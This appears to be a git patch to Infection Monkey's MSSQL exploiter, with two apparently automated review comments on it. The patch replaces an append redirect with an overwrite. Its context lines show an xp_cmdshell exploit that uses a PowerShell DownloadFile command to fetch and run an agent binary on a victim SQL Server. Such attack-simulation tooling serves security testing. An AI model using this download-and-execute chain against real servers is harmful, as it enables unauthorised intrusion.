From 7846a6cac1ac4b34b1a3a7ffd5a9e957a857e17b Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Tue, 14 Jun 2022 12:13:45 -0400
Subject: [PATCH] Agent: Remove create_empty_payload_file() in MSSQLExploiter

Since the commands are no longer split up into 128 character chunks, it's simpler to just overwrite an existing file using `>` than to create an empty file and append to it.
---
 monkey/infection_monkey/exploit/mssqlexec.py | 17 ++---------------
 1 file changed, 2 insertions(+), 15 deletions(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 4f9608acb..8b378f418 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
 XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
 XP_CMDSHELL_COMMAND_END = "'"
 EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}"
- CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
+ EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
 MONKEY_DOWNLOAD_COMMAND = (
 "powershell (new-object System.Net.WebClient)."
 "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
 try:
 # Create dir for payload
 self.create_temp_dir()
- self.create_empty_payload_file()
 http_thread = self.start_monkey_server(monkey_path_on_victim)
 self.upload_monkey(monkey_path_on_victim)
 MSSQLExploiter._stop_monkey_server(http_thread)
- # Clear payload to pass in another command
- self.create_empty_payload_file()
-
 self.run_monkey(monkey_path_on_victim)
 self.remove_temp_dir()
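Review bot: With both create_empty_payload_file() calls removed from the try block, correctness now depends on every command that writes the payload file using a truncating `>` redirect rather than `>>`, and nothing in the new code records that invariant. The commit message says the 128-character chunking is gone, but run_mssql_command still calls split_into_array_of_smaller_payloads() (visible as context in the next hunk); if a payload ever did split into several chunks, each chunk written with `>` would overwrite the previous one instead of appending, so the upload or launch would silently run a truncated command. I would add a comment above `self.run_monkey(monkey_path_on_victim)` such as `# Every payload command overwrites the payload file with '>', so no clearing step is needed between upload and run`, and, if the split helper is being kept, have run_mssql_command log or reject a payload that splits into more than one chunk. The enclosing method's signature and its except/cleanup path are outside this hunk.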
@@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
 )
 self.run_mssql_command(dir_creation_command)
- def create_empty_payload_file(self):
- logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
- suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
- payload_file_path=self.payload_file_path
- )
- tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
- self.run_mssql_command(tmp_file_creation_command)
-
 def run_mssql_command(self, mssql_command):
 array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
 if not array_of_commands:
@@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
 monkey_args = build_monkey_commandline(
 self.host, self.current_depth - 1, monkey_path_on_victim
 )
- suffix = ">>{}".format(self.payload_file_path)
+ suffix = ">{}".format(self.payload_file_path)
 prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
 return MSSQLLimitedSizePayload(
 command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
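Review bot: The new suffix in the last hunk is still a hand-built literal, `suffix = ">{}".format(self.payload_file_path)`, even though the first hunk introduces `EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"` with exactly that value, and the prefix on the very next line is already taken from the class constant; the new constant is not referenced in any hunk shown here. Using it on both sides keeps the redirect form in one place: `suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)`. Otherwise a later change to the redirect has to be made twice, which is the same `>`/`>>` drift this commit is cleaning up. The method this hunk belongs to starts outside the hunk, so its name and signature cannot be confirmed from here.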